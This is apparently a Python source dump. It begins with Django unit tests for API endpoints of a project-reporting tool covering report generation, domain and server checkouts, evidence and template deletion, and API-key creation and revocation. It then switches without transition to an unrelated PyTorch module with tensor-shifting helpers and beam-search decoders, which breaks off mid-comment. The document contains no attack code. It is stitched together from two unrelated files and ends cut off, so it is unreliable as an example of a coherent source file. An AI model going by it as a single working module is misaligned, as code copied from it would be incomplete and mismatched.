        self.assertEqual(response.status_code, 200)
        # Test bypasses Hasura so the ``["data"]["whoami"]`` keys are not present
        self.assertEqual(response.json()["username"], self.user.username)
class HasuraGenerateReportTests(TestCase):
    """Collection of tests for :view:`api:GraphqlGenerateReport`."""

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.assignment = ProjectAssignmentFactory(operator=cls.user)
        cls.report = ReportFactory(project=cls.assignment.project)
        cls.other_report = ReportFactory()
        cls.uri = reverse("api:graphql_generate_report")

    def setUp(self):
        self.client = Client()
        self.client_auth = Client()
        # Log in once and fail fast — the original called ``login`` twice
        self.assertTrue(
            self.client_auth.login(username=self.user.username, password=PASSWORD)
        )

    def test_graphql_generate_report(self):
        """An operator assigned to the project may generate its report."""
        _, token = utils.generate_jwt(self.user)
        data = {"input": {"id": self.report.pk}}
        response = self.client.post(
            self.uri,
            data=data,
            content_type="application/json",
            **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
        )
        self.assertEqual(response.status_code, 200)

    def test_graphql_generate_report_with_invalid_report(self):
        """A nonexistent report id is treated as unauthorized (401)."""
        _, token = utils.generate_jwt(self.user)
        data = {"input": {"id": 999}}
        response = self.client.post(
            self.uri,
            data=data,
            content_type="application/json",
            **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
        )
        self.assertEqual(response.status_code, 401)
        result = {
            "message": "Unauthorized access",
            "extensions": {"code": "Unauthorized"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_graphql_generate_report_without_access(self):
        """A report on an unassigned project is unauthorized (401)."""
        _, token = utils.generate_jwt(self.user)
        data = {"input": {"id": self.other_report.pk}}
        response = self.client.post(
            self.uri,
            data=data,
            content_type="application/json",
            **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
        )
        self.assertEqual(response.status_code, 401)
        result = {
            "message": "Unauthorized access",
            "extensions": {"code": "Unauthorized"},
        }
        self.assertJSONEqual(force_str(response.content), result)
class HasuraCheckoutTests(TestCase):
    """
    Collection of tests for the ``HasuraCheckoutView`` class and the related
    :view:`api:GraphqlCheckoutDomain` and :view:`api:GraphqlCheckoutServer`.
    """

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.activity = ActivityTypeFactory()
        cls.project = ProjectFactory()
        cls.other_project = ProjectFactory()
        cls.assignment = ProjectAssignmentFactory(operator=cls.user, project=cls.project)
        cls.domain_unavailable = DomainStatusFactory(domain_status="Unavailable")
        cls.domain = DomainFactory()
        cls.unavailable_domain = DomainFactory(domain_status=cls.domain_unavailable)
        cls.expired_domain = DomainFactory(expiration=timezone.now() - timedelta(days=1))
        cls.server_unavailable = ServerStatusFactory(server_status="Unavailable")
        cls.server = StaticServerFactory()
        cls.unavailable_server = StaticServerFactory(server_status=cls.server_unavailable)
        cls.server_role = ServerRoleFactory()
        cls.domain_uri = reverse("api:graphql_checkout_domain")
        cls.server_uri = reverse("api:graphql_checkout_server")

    def setUp(self):
        self.client = Client()
        self.client_auth = Client()
        # Log in once and fail fast — the original called ``login`` twice
        self.assertTrue(
            self.client_auth.login(username=self.user.username, password=PASSWORD)
        )

    def auth_headers(self, token):
        # Headers shared by every checkout request in this class
        return {
            "HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}",
            "HTTP_AUTHORIZATION": f"Bearer {token}",
        }

    def generate_domain_data(
        self, project, domain, activity,
        start_date=None, end_date=None, note=None
    ):
        """Build a domain-checkout action payload.

        ``start_date``/``end_date`` default to yesterday/tomorrow computed at
        *call* time. The original computed ``date.today()`` in the default
        arguments, which Python evaluates once at class-definition time —
        a stale-date hazard for any long-lived process.
        """
        if start_date is None:
            start_date = date.today() - timedelta(days=1)
        if end_date is None:
            end_date = date.today() + timedelta(days=1)
        return {
            "input": {
                "projectId": project,
                "domainId": domain,
                "activityTypeId": activity,
                "startDate": start_date,
                "endDate": end_date,
                "note": note,
            }
        }

    def generate_server_data(
        self, project, server, activity, server_role,
        start_date=None, end_date=None, note=None
    ):
        """Build a server-checkout action payload (same date handling as
        ``generate_domain_data``)."""
        if start_date is None:
            start_date = date.today() - timedelta(days=1)
        if end_date is None:
            end_date = date.today() + timedelta(days=1)
        return {
            "input": {
                "projectId": project,
                "serverId": server,
                "activityTypeId": activity,
                "serverRoleId": server_role,
                "startDate": start_date,
                "endDate": end_date,
                "note": note,
            }
        }

    def test_graphql_checkout_domain(self):
        """A valid domain checkout succeeds and marks the domain unavailable."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_domain_data(self.project.pk, self.domain.pk, self.activity.pk, note="Test note")
        response = self.client.post(
            self.domain_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 200)
        self.assertJSONEqual(force_str(response.content), {"result": "success", })
        self.domain.refresh_from_db()
        self.assertEqual(self.domain.domain_status, self.domain_unavailable)

    def test_graphql_checkout_server(self):
        """A valid server checkout succeeds and marks the server unavailable."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_server_data(self.project.pk, self.server.pk, self.activity.pk, self.server_role.pk, note="Test note")
        response = self.client.post(
            self.server_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 200)
        self.assertJSONEqual(force_str(response.content), {"result": "success", })
        self.server.refresh_from_db()
        self.assertEqual(self.server.server_status, self.server_unavailable)

    def test_graphql_checkout_server_with_invalid_role(self):
        """An unknown server role id is rejected with 400."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_server_data(self.project.pk, self.server.pk, self.activity.pk, 999, note="Test note")
        response = self.client.post(
            self.server_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 400)
        result = {
            "message": "Server Role Type does not exist",
            "extensions": {"code": "ServerRoleDoesNotExist"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_graphql_checkout_object_with_invalid_dates(self):
        """Reversed or malformed dates are rejected with 400."""
        _, token = utils.generate_jwt(self.user)
        # End date before start date
        data = self.generate_domain_data(
            self.project.pk,
            self.domain.pk,
            self.activity.pk,
            start_date=date.today() + timedelta(days=1),
            end_date=date.today() - timedelta(days=1),
        )
        response = self.client.post(
            self.domain_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 400)
        result = {
            "message": "End date is before start date",
            "extensions": {"code": "InvalidDates"},
        }
        self.assertJSONEqual(force_str(response.content), result)
        # Malformed (non ISO-8601) start date
        data = self.generate_domain_data(
            self.project.pk,
            self.domain.pk,
            self.activity.pk,
            start_date="2022-0325",
            end_date=date.today() - timedelta(days=1),
        )
        response = self.client.post(
            self.domain_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 400)
        result = {
            "message": "Invalid date values (must be YYYY-MM-DD)",
            "extensions": {"code": "InvalidDates"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_graphql_checkout_invalid_object(self):
        """An unknown domain id is rejected with 400."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_domain_data(self.project.pk, 999, self.activity.pk)
        response = self.client.post(
            self.domain_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 400)
        result = {
            "message": "Domain does not exist",
            "extensions": {"code": "DomainDoesNotExist"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_graphql_checkout_invalid_activity(self):
        """An unknown activity type id is rejected with 400."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_domain_data(self.project.pk, self.domain.pk, 999)
        response = self.client.post(
            self.domain_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 400)
        result = {
            "message": "Activity Type does not exist",
            "extensions": {"code": "ActivityTypeDoesNotExist"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_graphql_checkout_invalid_project(self):
        """An unknown project id is treated as unauthorized (401)."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_domain_data(999, self.domain.pk, self.activity.pk)
        response = self.client.post(
            self.domain_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 401)
        result = {
            "message": "Unauthorized access",
            "extensions": {"code": "Unauthorized"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_graphql_checkout_unavailable_domain(self):
        """A domain already checked out cannot be checked out again (400)."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_domain_data(self.project.pk, self.unavailable_domain.pk, self.activity.pk)
        response = self.client.post(
            self.domain_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 400)
        result = {
            "message": "Domain is unavailable",
            "extensions": {"code": "DomainUnavailable"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_graphql_checkout_unavailable_server(self):
        """A server already checked out cannot be checked out again (400)."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_server_data(self.project.pk, self.unavailable_server.pk, self.activity.pk, self.server_role.pk)
        response = self.client.post(
            self.server_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 400)
        result = {
            "message": "Server is unavailable",
            "extensions": {"code": "ServerUnavailable"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_graphql_checkout_expired_domain(self):
        """An expired domain cannot be checked out (400)."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_domain_data(self.project.pk, self.expired_domain.pk, self.activity.pk)
        response = self.client.post(
            self.domain_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 400)
        result = {
            "message": "Domain is expired",
            "extensions": {"code": "DomainExpired"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_graphql_checkout_without_project_access(self):
        """Checking out against an unassigned project is unauthorized (401)."""
        _, token = utils.generate_jwt(self.user)
        data = self.generate_domain_data(self.other_project.pk, self.domain.pk, self.activity.pk)
        response = self.client.post(
            self.domain_uri,
            data=data,
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 401)
        result = {
            "message": "Unauthorized access",
            "extensions": {"code": "Unauthorized"},
        }
        self.assertJSONEqual(force_str(response.content), result)
class CheckoutDeleteViewTests(TestCase):
    """
    Collection of tests for ``CheckoutDeleteView`` class and related
    :view:`api.GraphqlDomainReleaseAction` and :view:`api.GraphqlServerReleaseAction`.
    """

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.domain_uri = reverse("api:graphql_domain_checkout_delete")
        cls.server_uri = reverse("api:graphql_server_checkout_delete")
        cls.project = ProjectFactory()
        cls.other_project = ProjectFactory()
        ProjectAssignmentFactory(operator=cls.user, project=cls.project)
        cls.domain_available = DomainStatusFactory(domain_status="Available")
        cls.domain_unavailable = DomainStatusFactory(domain_status="Unavailable")
        cls.domain = DomainFactory(domain_status=cls.domain_unavailable)
        cls.domain_checkout = HistoryFactory(domain=cls.domain, project=cls.project)
        cls.other_domain = DomainFactory(domain_status=cls.domain_unavailable)
        cls.other_checkout = HistoryFactory(domain=cls.other_domain, project=cls.other_project)
        cls.server_available = ServerStatusFactory(server_status="Available")
        cls.server_unavailable = ServerStatusFactory(server_status="Unavailable")
        cls.server = StaticServerFactory(server_status=cls.server_unavailable)
        cls.server_checkout = ServerHistoryFactory(server=cls.server, project=cls.project)

    def setUp(self):
        self.client = Client()
        self.client_auth = Client()
        # Log in once and fail fast — the original called ``login`` twice
        self.assertTrue(
            self.client_auth.login(username=self.user.username, password=PASSWORD)
        )

    def generate_data(self, checkout_id):
        return {"input": {"checkoutId": checkout_id, }}

    def auth_headers(self, token):
        # Headers shared by every request in this class
        return {
            "HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}",
            "HTTP_AUTHORIZATION": f"Bearer {token}",
        }

    def test_deleting_domain_checkout(self):
        """Deleting a domain checkout releases the domain back to Available."""
        _, token = utils.generate_jwt(self.user)
        response = self.client.post(
            self.domain_uri,
            data=self.generate_data(self.domain_checkout.pk),
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 200)
        self.domain.refresh_from_db()
        self.assertEqual(self.domain.domain_status, self.domain_available)

    def test_deleting_server_checkout(self):
        """Deleting a server checkout releases the server back to Available."""
        _, token = utils.generate_jwt(self.user)
        response = self.client.post(
            self.server_uri,
            data=self.generate_data(self.server_checkout.pk),
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 200)
        self.server.refresh_from_db()
        self.assertEqual(self.server.server_status, self.server_available)

    def test_deleting_domain_checkout_without_access(self):
        """A checkout belonging to another project is off-limits (401)."""
        _, token = utils.generate_jwt(self.user)
        response = self.client.post(
            self.domain_uri,
            data=self.generate_data(self.other_checkout.pk),
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 401)
        result = {
            "message": "Unauthorized access",
            "extensions": {"code": "Unauthorized"},
        }
        self.assertJSONEqual(force_str(response.content), result)

    def test_deleting_invalid_checkout(self):
        """An unknown checkout id is rejected with 400."""
        _, token = utils.generate_jwt(self.user)
        response = self.client.post(
            self.domain_uri,
            data=self.generate_data(checkout_id=999),
            content_type="application/json",
            **self.auth_headers(token),
        )
        self.assertEqual(response.status_code, 400)
        result = {
            "message": "Checkout does not exist",
            "extensions": {"code": "HistoryDoesNotExist"},
        }
        self.assertJSONEqual(force_str(response.content), result)
class GraphqlDeleteEvidenceActionTests(TestCase):
    """Collection of tests for :view:`GraphqlDeleteEvidenceAction`."""

    @classmethod
    def setUpTestData(cls):
        cls.Evidence = EvidenceFactory._meta.model
        cls.user = UserFactory(password=PASSWORD)
        cls.uri = reverse("api:graphql_delete_evidence")
        cls.project = ProjectFactory()
        cls.other_project = ProjectFactory()
        ProjectAssignmentFactory(operator=cls.user, project=cls.project)
        cls.report = ReportFactory(project=cls.project)
        cls.other_report = ReportFactory(project=cls.other_project)
        cls.finding = ReportFindingLinkFactory(report=cls.report)
        cls.other_finding = ReportFindingLinkFactory(report=cls.other_report)
        cls.evidence = EvidenceFactory(finding=cls.finding)
        cls.other_evidence = EvidenceFactory(finding=cls.other_finding)

    def setUp(self):
        self.client = Client()

    def generate_data(self, evidence_id):
        return {"input": {"evidenceId": evidence_id, }}

    def delete_evidence(self, evidence_id, token):
        # Shared POST used by every test in this class
        return self.client.post(
            self.uri,
            data=self.generate_data(evidence_id),
            content_type="application/json",
            HTTP_HASURA_ACTION_SECRET=f"{ACTION_SECRET}",
            HTTP_AUTHORIZATION=f"Bearer {token}",
        )

    def test_deleting_evidence(self):
        """An assigned operator can delete evidence on their project."""
        _, token = utils.generate_jwt(self.user)
        resp = self.delete_evidence(self.evidence.id, token)
        self.assertEqual(resp.status_code, 200)
        self.assertFalse(self.Evidence.objects.filter(id=self.evidence.id).exists())

    def test_deleting_evidence_with_invalid_id(self):
        """An unknown evidence id is rejected with 400."""
        _, token = utils.generate_jwt(self.user)
        resp = self.delete_evidence(999, token)
        self.assertEqual(resp.status_code, 400)

    def test_deleting_evidence_without_access(self):
        """Evidence on an unassigned project is off-limits (401)."""
        _, token = utils.generate_jwt(self.user)
        resp = self.delete_evidence(self.other_evidence.id, token)
        self.assertEqual(resp.status_code, 401)
class GraphqlDeleteReportTemplateAction(TestCase):
    """Collection of tests for :view:`GraphqlDeleteReportTemplateAction`."""

    @classmethod
    def setUpTestData(cls):
        cls.ReportTemplate = ReportTemplateFactory._meta.model
        cls.user = UserFactory(password=PASSWORD)
        cls.mgr_user = UserFactory(password=PASSWORD, role="manager")
        cls.uri = reverse("api:graphql_delete_template")
        cls.template = ReportTemplateFactory()
        cls.protected_template = ReportTemplateFactory(protected=True)

    def setUp(self):
        self.client = Client()

    def generate_data(self, template_id):
        return {"input": {"templateId": template_id, }}

    def delete_template(self, template_id, token):
        # Shared POST used by every test in this class
        return self.client.post(
            self.uri,
            data=self.generate_data(template_id),
            content_type="application/json",
            HTTP_HASURA_ACTION_SECRET=f"{ACTION_SECRET}",
            HTTP_AUTHORIZATION=f"Bearer {token}",
        )

    def test_deleting_template(self):
        """Any authenticated user can delete an unprotected template."""
        _, token = utils.generate_jwt(self.user)
        resp = self.delete_template(self.template.id, token)
        self.assertEqual(resp.status_code, 200)
        self.assertFalse(self.ReportTemplate.objects.filter(id=self.template.id).exists())

    def test_deleting_template_with_invalid_id(self):
        """An unknown template id is rejected with 400."""
        _, token = utils.generate_jwt(self.user)
        resp = self.delete_template(999, token)
        self.assertEqual(resp.status_code, 400)

    def test_deleting_protected_template_with_access(self):
        """A manager may delete a protected template."""
        _, token = utils.generate_jwt(self.mgr_user)
        resp = self.delete_template(self.protected_template.id, token)
        self.assertEqual(resp.status_code, 200)

    def test_deleting_protected_template_without_access(self):
        """A regular user may not delete a protected template (401)."""
        _, token = utils.generate_jwt(self.user)
        resp = self.delete_template(self.protected_template.id, token)
        self.assertEqual(resp.status_code, 401)
# Tests related to Hasura Event Triggers
class GraphqlDomainUpdateEventTests(TestCase):
    """Collection of tests for :view:`api:GraphqlDomainUpdateEvent`."""

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.uri = reverse("api:graphql_domain_update_event")
        cls.domain = DomainFactory(name="chrismaddalena.com")
        # A representative Hasura event payload; note the mixed-case ``name``
        # value used to verify the handler normalizes it
        cls.sample_data = {
            "event": {
                "data": {
                    "new": {
                        "expired": False,
                        "registrar": "Hover",
                        "note": "<p>The personal website and blog of <NAME></p>",
                        "last_health_check": "",
                        "auto_renew": True,
                        "expiration": "2023-03-25",
                        "reset_dns": False,
                        "vt_permalink": "",
                        "burned_explanation": "",
                        "creation": "2010-03-25",
                        "domain_status_id": cls.domain.domain_status.id,
                        "last_used_by_id": "",
                        "name": "Chrismaddalena.com",
                        "categorization": "",
                        "health_status_id": cls.domain.health_status.id,
                        "id": cls.domain.id,
                        "whois_status_id": 1,
                        "dns": {}
                    },
                    "old": {},
                },
            }
        }

    def setUp(self):
        self.client = Client()

    def test_graphql_domain_update_event(self):
        """The event handler accepts the payload and lower-cases the name."""
        resp = self.client.post(
            self.uri,
            content_type="application/json",
            data=self.sample_data,
            HTTP_HASURA_ACTION_SECRET=f"{ACTION_SECRET}",
        )
        self.assertEqual(resp.status_code, 200)
        self.domain.refresh_from_db()
        self.assertEqual(self.domain.name, "chrismaddalena.com")
# Tests related to CBVs for :model:`api:APIKey`
class ApiKeyRevokeTests(TestCase):
    """Collection of tests for :view:`api:ApiKeyRevoke`."""

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.other_user = UserFactory(password=PASSWORD)
        cls.token_obj, cls.token = APIKey.objects.create_token(
            user=cls.user, name="User's Token"
        )
        cls.other_token_obj, cls.other_token = APIKey.objects.create_token(
            user=cls.other_user, name="Other User's Token"
        )
        cls.uri = reverse("api:ajax_revoke_token", kwargs={"pk": cls.token_obj.pk})
        cls.other_uri = reverse("api:ajax_revoke_token", kwargs={"pk": cls.other_token_obj.pk})

    def setUp(self):
        self.client = Client()
        self.client_auth = Client()
        # Log in once and fail fast — the original called ``login`` twice
        self.assertTrue(
            self.client_auth.login(username=self.user.username, password=PASSWORD)
        )

    def test_view_uri_exists_at_desired_location(self):
        """Revoking one's own token succeeds and flips ``revoked``."""
        data = {"result": "success", "message": "Token successfully revoked!"}
        response = self.client_auth.post(self.uri)
        self.assertEqual(response.status_code, 200)
        self.assertJSONEqual(force_str(response.content), data)
        self.token_obj.refresh_from_db()
        self.assertEqual(self.token_obj.revoked, True)

    def test_view_requires_login(self):
        """Anonymous requests are redirected (302) to the login page."""
        response = self.client.get(self.uri)
        self.assertEqual(response.status_code, 302)

    def test_revoking_another_users_token(self):
        # NOTE(review): this posts with the *unauthenticated* client, so the
        # 302 is merely the login redirect and the ownership check is never
        # exercised — presumably ``client_auth`` was intended; confirm against
        # the view before changing it.
        response = self.client.post(self.other_uri)
        self.assertEqual(response.status_code, 302)
class ApiKeyCreateTests(TestCase):
    """Collection of tests for :view:`api:ApiKeyCreate`."""

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.uri = reverse("api:ajax_create_token")
        cls.redirect_uri = reverse("users:user_detail", kwargs={"username": cls.user.username})

    def setUp(self):
        self.client = Client()
        self.client_auth = Client()
        # Log in once and fail fast — the original called ``login`` twice
        self.assertTrue(
            self.client_auth.login(username=self.user.username, password=PASSWORD)
        )

    def test_view_uri_exists_at_desired_location(self):
        response = self.client_auth.get(self.uri)
        self.assertEqual(response.status_code, 200)

    def test_view_requires_login(self):
        response = self.client.get(self.uri)
        self.assertEqual(response.status_code, 302)

    def test_view_uses_correct_template(self):
        response = self.client_auth.get(self.uri)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, "token_form.html")

    def test_custom_context_exists(self):
        response = self.client_auth.get(self.uri)
        self.assertIn("cancel_link", response.context)
        self.assertEqual(response.context["cancel_link"], self.redirect_uri)

    def test_post_data(self):
        """Posting a valid form creates the key and redirects to the profile.

        The posted name must match the lookup below — the original posted the
        redaction placeholder ``"<NAME>"`` and then queried for
        ``"CreateView Test"``, which could never match and raised
        ``APIKey.DoesNotExist``.
        """
        response = self.client_auth.post(
            self.uri, data={"name": "CreateView Test", "expiry_date": datetime.now()}
        )
        self.assertRedirects(response, self.redirect_uri)
        obj = APIKey.objects.get(name="CreateView Test")
        self.assertEqual(obj.user, self.user)
# models/utils.py
import torch
import torch.nn as nn
def roll_left(x, n=1):
    """Rotate ``x`` left by ``n`` positions along dim 1 (wrap-around)."""
    head, tail = x[:, :n], x[:, n:]
    return torch.cat((tail, head), dim=1)
def roll_right(x, n=1):
    """Rotate ``x`` right by ``n`` positions along dim 1 (wrap-around)."""
    head, tail = x[:, :-n], x[:, -n:]
    return torch.cat((tail, head), dim=1)
def shift_right(x, dim=1, n=1, fill="arithmetic"):
    """Shift ``x`` right by ``n`` steps along ``dim``, dropping the last ``n``
    entries and prepending padding.

    Args:
        x: input tensor.
        dim: dimension to shift along.
        n: shift amount; ``n == 0`` returns ``x`` unchanged.
        fill: what to prepend — "arithmetic" repeats the first slice along
            ``dim``, "roll" wraps the last ``n`` slices around (only valid for
            ``dim == 1``; the indexing below is hard-coded to dim 1), and
            "zero" pads with zeros.

    Raises:
        ValueError: for an unrecognized ``fill``.
    """
    # Bug fix: with n == 0 the original built ``slice(0, -0)`` == ``slice(0, 0)``
    # and returned an empty tensor instead of the identity shift.
    if n == 0:
        return x
    size = x.size()
    pre_size, pos_size = size[:dim], size[dim + 1:]
    if fill == "arithmetic":
        # Repeat the first slice along ``dim`` n times
        pad = x[tuple(slice(None) for _ in pre_size) + (0, )]
        pad = pad.unsqueeze(dim).expand(*pre_size, n, *pos_size)
    elif fill == "roll":
        pad = x[:, -n:]
    elif fill == "zero":
        pad = x.new_zeros(*pre_size, n, *pos_size)
    else:
        raise ValueError(f"unrecognized fill type: {fill}")
    # Everything except the last n slices along ``dim``
    sx = x[tuple(slice(None) for _ in pre_size) + (slice(0, -n),)]
    return torch.cat([pad, sx], dim)
def mask(lens, max_len=None):
    """Build a boolean mask of shape ``[batch, max_len]`` from lengths.

    Position ``(b, t)`` is True iff ``t < lens[b]``.

    Args:
        lens: long tensor of sequence lengths, shape ``[batch]``.
        max_len: mask width; defaults to ``lens.max()``.

    Uses ``torch.arange`` instead of the deprecated ``torch.range`` (which
    is endpoint-inclusive, returns float, and required the extra ``.long()``).
    """
    if max_len is None:
        max_len = lens.max().item()
    positions = torch.arange(max_len, dtype=torch.long, device=lens.device)
    return lens.unsqueeze(1) > positions.unsqueeze(0)
def chop(xs, dim=0):
    """Split ``xs`` into a tuple of tensors along ``dim``, with that dim
    removed from each piece (``unbind`` is the split(1)+squeeze idiom)."""
    return torch.unbind(xs, dim)
def embed_dot(emb, x):
    """Score ``x`` against every embedding vector: ``x @ emb.weight.T``.

    ``x`` is flattened to 2-D for the matmul and the leading dims are
    restored on the result, whose last dim becomes the vocabulary size.
    """
    flat = x.view(-1, x.size(-1))
    scores = torch.mm(flat, emb.weight.t())
    return scores.view(*x.size()[:-1], -1)
class BeamSearchSequenceDecoder(object):
    """
    To make my life a little easier, this beam-search decoder assumes
    several things:

    1) The model we are dealing with is an rnn-like model with the following
    signature:

        input float-tensor [batch_size, max_len, input_dim], \
        (optional) lengths long-tensor [batch_size], \
        (optional) initial hidden float-tensor [batch_size, hidden_dim] ->
            hidden states float-tensor [batch_size, max_len, hidden_dim], \
            cell states float-tensor [batch_size, max_len, hidden_dim], \
            final-step hidden state float-tensor [batch_size, hidden_dim]

    2) Encoding and decoding functions that map from discrete indices to
    continuous representations and vice versa are provided with the following
    signatures:

        - encoder:
            discrete indices long-tensor [batch_size, max_len] ->
                latent rep. float-tensor [batch_size, max_len, input_dim]
        - decoder:
            latent rep. float-tensor [batch_size, max_len, hidden_dim] ->
                prob. distribution long-tensor [batch_size, max_len, num_labels]

    3) Assumes that bos and (optionally) eos labels are recognized by the
    label vocabulary and the rnn model. These are necessary for initial
    priming.

    Inherit this class and implement relevant methods and call `decode` method.
    """

    def __init__(self, bos, eos=None, maxlen=100, beam_size=3):
        # bos/eos are label indices used for priming / termination detection.
        self.bos = bos
        self.eos = eos
        self.maxlen = maxlen
        self.beam_size = beam_size
        # Sentinels used to pin finished beams onto <eos>.
        self.max_float = 1e10
        self.min_float = -1e10
        self.softmax = nn.Softmax(2)

    def _rnn(self, w, lens=None, h=None):
        """Subclass hook: run the rnn-like model (see class docstring)."""
        raise NotImplementedError()

    def _encode_discrete(self, w):
        """Subclass hook: map label indices to continuous inputs."""
        raise NotImplementedError()

    def _decode_discrete(self, h):
        """Subclass hook: map hidden states to per-label logits."""
        raise NotImplementedError()

    def decode(self, z):
        """Beam-search decode conditioned on initial hidden state ``z``.

        Returns (sequences [batch, beam, len] incl. the bos prefix,
        lengths [batch, beam], cumulative probabilities [batch, beam]).
        """
        batch_size = z.size(0)
        # forces the beam searcher to search from the first index only
        # in the beginning
        x = z.new(batch_size, 1, 1).long().fill_(self.bos)
        has_eos = x.new(batch_size, 1).zero_().byte()
        probs = z.new(batch_size, 1).fill_(1.0)
        lens = x.new(batch_size, 1).fill_(1).long()
        while has_eos.prod().item() != 1 and lens.max() < self.maxlen:
            cur_beamsize, seq_len = x.size(1), x.size(2)
            # Flatten (batch, beam) so every beam runs through the rnn at once.
            x_emb = self._encode_discrete(x)
            x_emb = x_emb.view(batch_size * cur_beamsize, seq_len, -1)
            z_exp = z.unsqueeze(1).expand(batch_size, cur_beamsize, -1) \
                .contiguous().view(batch_size * cur_beamsize, -1)
            xo, _, _ = self._rnn(x_emb, lens.view(-1), z_exp)
            xo = xo[:, -1].view(batch_size, cur_beamsize, -1)
            logits = self._decode_discrete(xo)
            # for beams that already generated <eos>, prevent probability
            # depreciation.
            if self.eos is not None:
                eos_mask = has_eos.unsqueeze(-1).float()
                logits_eos = torch.full_like(logits, self.min_float)
                logits_eos[:, :, self.eos] = self.max_float
                logits = logits * (1 - eos_mask) + logits_eos * eos_mask
            # [batch_size x beam_size x vocab_size]
            p_vocab = probs.unsqueeze(-1) * self.softmax(logits)
            vocab_size = p_vocab.size(-1)
            # utilize 2d-flattened-to-1d indices
            probs, idx = torch.sort(p_vocab.view(batch_size, -1), 1, True)
            probs, idx = \
                probs[:, :self.beam_size], idx[:, :self.beam_size].long()
            # BUG FIX: `idx / vocab_size` true-divides integer tensors in
            # modern PyTorch, producing a float tensor that torch.gather
            # rejects as an index; use floor division.
            beam_idx, preds = idx // vocab_size, idx % vocab_size
            x = torch.gather(x, 1,
                             beam_idx.unsqueeze(-1).expand(-1, -1, x.size(-1)))
            x = torch.cat([x, preds.unsqueeze(-1)], 2)
            if self.eos is not None:
                has_eos = torch.gather(has_eos, 1, beam_idx)
                has_eos = (preds == self.eos) | has_eos
            lens = torch.gather(lens, 1, beam_idx)
            lens += (1 - has_eos).long()
        return x, lens + 1, probs
class BeamSearchDecoder(object):
    """Beam search over a precomputed grid of per-step log-probabilities.

    Args:
        logprobs: float tensor [batch_size, max_len, num_labels].
        lens: optional long tensor [batch_size]; positions past a sequence's
            length keep their pre-step cumulative score (no extra terms added).
        beam_size: number of hypotheses kept per step.
    """

    def __init__(self, logprobs, lens=None, beam_size=5):
        # [batch_size x max_len x num_labels] tensor
        self.logprobs = logprobs
        self.lens = lens
        self.beam_size = beam_size
        self.mask = None
        if self.lens is not None:
            self.mask = mask(lens, self.max_len)

    @property
    def batch_size(self):
        return self.logprobs.size(0)

    @property
    def max_len(self):
        return self.logprobs.size(1)

    @property
    def num_labels(self):
        return self.logprobs.size(2)

    def decode(self):
        """Return (label sequences [batch, beam, max_len] sorted best-first,
        cumulative log-probabilities [batch, beam])."""
        # [batch_size x 1 x 1] LongTensor
        cum_logprobs, x = self.logprobs[:, 0].max(1)
        x = x.unsqueeze(1).unsqueeze(1)
        cum_logprobs = cum_logprobs.unsqueeze(1)
        for t in range(1, self.max_len):
            logprobs = self.logprobs[:, t]
            new_logprobs = cum_logprobs.unsqueeze(-1) + logprobs.unsqueeze(1)
            # utilize 2d-flattened-to-1d indices
            new_logprobs_flat, idx_flat = \
                torch.sort(new_logprobs.view(self.batch_size, -1), 1, True)
            new_logprobs_flat, idx_flat = \
                new_logprobs_flat[:, :self.beam_size], \
                idx_flat[:, :self.beam_size]
            # BUG FIX: `idx_flat / self.num_labels` true-divides integer
